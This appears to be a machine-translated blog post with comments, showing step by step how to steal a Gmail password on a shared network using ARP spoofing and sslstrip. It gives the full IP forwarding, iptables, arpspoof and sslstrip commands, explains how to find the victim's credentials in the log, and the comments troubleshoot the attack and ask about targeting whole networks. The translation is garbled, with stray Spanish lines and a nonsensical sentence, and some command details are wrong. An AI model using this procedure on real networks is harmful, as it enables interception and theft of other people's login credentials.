Merhaba Blogcular.
Bugün için, çoğumuzun sevdiği güvenli olmayan herhangi bir ağa bağlanmanın ne kadar tehlikeli olabileceğine dair küçük bir örneğim var.
Bugün için, bir Gmail şifresi almak için Sslstrip ile ArpSpoofing'i kullanacağım. Ortamı daha kontrollü hale getirmek için "testarp@gmail.com anlayışının sonucu olarak, buzdolabında iki üç günden fazla durmayan küçük şişeler elinizin altında bulunur.
Önsözleri pek sevmediğim için, hadi işe koyulalım.
ÇEVRE
Bu test için elimizde şunlar var:
1. Saldırgan: Debian Wheezy'ye sahip olan benim masaüstü veya masaüstü bilgisayarım. Depolardan kurabilirsiniz şifre şeridi y koklamak sahip olmak harp sızdırma
2. Kurban: Kurban, postasını yalnızca tarayıcı üzerinden görmek isteyen bir Android Tablet.
3. Ortam: Orta benim Cisco DPC2425 Yönlendirici
ADRESLER.
Saldırgan adresi: 172.26.0.2
Yönlendirici Adresi: 172.26.0.1
Kurbanın Adresi: 172.26.0.8
SALDIRI:
Bu saldırı için yapacağımız ilk şey, bilgisayarımızın bilgileri mağdura farkına varmadan iletebilmesi için iletimi etkinleştirmektir. (Aksi takdirde bu bir hizmet reddi saldırısı olur)
Bunun için kullanacağız:
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080
arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
sslstrip -a -w desdelinux -l 8080
Ahora si hacemos tail -f desdelinux vemos la informacion en vivo y en directo
Öyleyse istediğimizi nasıl elde ederiz?
Önce mailimizi Tablet'e girelim. Giriş yaparken konsolumuzda binlerce ve binlerce şeyin göründüğünü görüyoruz.
Ahora que ha terminado vamos a abrir nuestro archivo “desdelinux” con nano
nano desdelinux
Control + W ile GÜVENLİ POST adında bir şey arıyoruz.
Ve bunun gibi bir şey göreceğiz.
Görülemeyen bu devasa hat arasında kurbanın e-posta adresi ve şifresi var.
Bu yüzden tünelin sonundaki ışığı görene kadar sağa koşuyoruz.
Başka bir vesileyle kendimizi bu saldırılardan biraz nasıl koruyabileceğimizi göreceğiz.
selamlar
Bu vesileyle gönderi yayınlandığında komutların doğru olmadığını söylemek için kullanıyorum.
Sondaki iptables komutu, başka bir satırdaki 8080'i kaçırıyor. Ve sonra arpspoof komutlarının hepsi aynı satırdaydı. Her komut farklı bir satırdadır.
Umarım editör bunu görür ve düzeltebilir.
Selamlar.
Bahsettiğiniz düzeltmeleri yaptım, olur mu?
Tercih edilen bir girişe kod girecekseniz, HTML görünümünü kullanın ve beklemeye göndermeden önce makalenin doğru olduğunu doğrulayın. Teşekkür ederim.
Bilgisi olmayanların bu kadar savunmasız olduğunu bilmek ürpertici. Çok iyi bilgiler konuyu çok az anlasam bile önemini anlıyorum. Teşekkür ederim!
selamlar
Ancak bu yalnızca saldırgan ve kurban aynı ağdaysa işe yarar. Her durumda, bana öyle geliyor ki (aynı ağda olmak) HTTPS kullanarak bağlanırsanız, bu, veriler makinenizden ayrılmadan ÖNCE şifrelenmiş olduğu için gerçekleşmez. HTTP ile (S olmadan) bağlanırsanız, ağ kablosuna baktığınızda bile anahtarları gördüğünüzü düşünüyorum.
Bu doğru değil. Bir gmail şifresini kırıyorum ve gmail'in https kullandığını fark ederseniz. Yani? Buradaki nokta, https güvenli olmasına rağmen http'ye bağlı olmasıdır. Yani o kadar güvenli değil.
Bir https hakkında o kadar çok itiraf etmeyin ki, S Süpermen için değil, "güvenli" içindir
https ile veya onsuz çalışıyor, daha özel bir linux dağıtımı ile denedim ve sorunsuz çalışıyor
Wi-Fi'nizi çalanlara bir ders vermek için onu tam olarak kullanabilirsiniz. 😀
Aşağı yukarı uzun zaman önce Chema Alonso'nun blogunda söylediklerine benziyor:
http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba.html
http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba_5.html
Ostia, yaptıkları harika! / Ve sonra banka hesabını kontrol etmeye gittiklerinde VPN'i her kullandığımda paranoyaklığıma söylüyorlar…). Bu arada, yorumlarda insanların ne kadar alaycı olduğunu görmelisiniz ... eğer sonunda hırsızlıksa ...
Şimdi kendi VPN hizmetinizi nasıl oluşturup sunacağınıza dair bir eğitim almamız gerekiyor.
Bağladığınız hikaye çok ilginç, hatta bir roman kitabına layık görünüyor ve bu, komşularımın internetini kullandığım zamanları hatırlamamı sağlıyor ve konuyu bildiğimi söylesem de gerçek boyutlarını asla göremediğimi düşünüyorum. dayanabileceğim tehlike, neyse ki benim için sadece şifreyi WPA2 olarak değiştirdiler ve ISS ile olan hikayem burada başladı haha
Bu yüzden başlık Sslstrip'in iş başında olduğunu söylüyor.
Saldırgan ortada olduğu sürece çalışır
Prism'de hangi dalgada çalışıyorsun? -.-
no.
XD talebinizi göndermek için ne bekliyorsunuz
Saygılarımızla
iyi yazı
İlginç, daha sonra bir eğitim testi yapacağım ... Belki WiFi şifresini kaldırabilir ve biraz eğlenebilirim 😛
Şans eseri, hedefin talep ettiği sayfalara farklı sayfalar göndermek için benzer bir şey yapabilir misiniz? Örneğin, Facebook'u açmak istiyorlar ve onları Google'a mı yönlendiriyorum? 😛
Evet. Ama hepsi çok farklı bir rulo.
Belki daha sonra gönderirim.
çok iyi bir gönderi, bu konular çok eğitici, şimdi bu saldırıya karşı koyabilmeliyiz, çünkü bazıları (benim gibi) halka açık ağlara (örneğin üniversite) bağlanmaktan kaçınmak faydalı olacaktır.
Selamlar!
Benim için işe yaramadı 🙁
Burada, https bağlantılarının bir sunucu sertifikası aracılığıyla şifrelenmesi (makinenizde sertifika aldıktan sonra, tarayıcınız şifrelemeden sorumludur) iptables ile 80 değil, 443 numaralı bağlantı noktasını (http) yeniden yönlendirdiğiniz gerçeği dışında bir şey bende başarısız oluyor. hangisi https
Ben de öyle düşünmüştüm. Asıl nokta, https'nin "güvenli" olmasına rağmen maalesef http'ye bağlı olmasıdır. Yani sslstrip bundan yararlanır, tarayıcının https kimlik bilgilerini kullandığına inanmasını sağlar, ancak kullanmaz.
Vay be! ancak tarayıcı "bu sertifika şüpheli bir siteden veya buna benzer bir siteden geliyor" gibi bir uyarı görmeli ... Kesinlikle testler yapmam gerekecek XD
Hayır, kesinlikle hiçbir şey çıkmıyor.
Sonunda benim için çalıştı
Parola ile bir WEP ağına bağlıyım ve yine de doğrudan parolayı gösterdi.
Sorgu. Tek bir kurban yerine ağa bağlı tüm bilgisayarlar için aynı prosedürü uygulayabilir misiniz?
Evet yapabilirsin. Ama deneyler yapmadım. Kendiniz deneyin ve bize nasıl olduğunuzu söyleyin.
Bununla elde ettiğim tek şey, kurbanın makinesinin çevrimdışı olması, ancak sslstrip bana hiçbir şey göstermiyor: /
Güvenlik duvarını bir an için devre dışı bırakmalısınız. Veya en azından gelen bağlantıları etkinleştirin.
Probe ve ben sadece facebook sayfasının kullanıcı adını ve şifresini görebiliyordum, gmail'de günlükte herhangi bir sonuç bulamadım, ayrıca sadece arpspoof «arpspoof -i -t« satırına ihtiyacım vardı. Öte yandan, kurban makine bazı sayfaları açamadı. Araştırmaya devam edeceğim, çok ilginç. Manjaro kullananlar için bir yardım, kurulacak paketler: dsniff (arpspoff), twisted ve python2-pyopenssl. Sslstrip buradan indirilebilir: http://www.thoughtcrime.org/software/sslstrip/
$ Python2 sslstrip.py çalıştırmak için
Selamlar.
Çıkmadı ama arpspoof hattı: #arpspoof -i int -t ip-victim ip-router
bak tam olarak ne diyorsan yapıyorum:
echo "1"> / proc / sys / net / ipv4 / ip_forward iptables -t nat -A PREROUTING -p tcp –hedef-bağlantı noktası 80 -j YÖNLENDİRME - 8080 bağlantı noktalarına
arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
Sorun şu ki, burada odamda bulunan başka bir bilgisayar olan mağdur, yönlendiriciyi yeniden başlatmam gereken noktaya bağlantısız kaldı, ne yapabilirim?
Bir sanal makine ile çalıştığım başka bir şey ve iwconfig komutunu çalıştırdığımda, wlan0 görünmüyor veya ifconfig çalıştırdığımda, ancak sanal makinemde internet varsa, eth0 arayüzü ile ne var.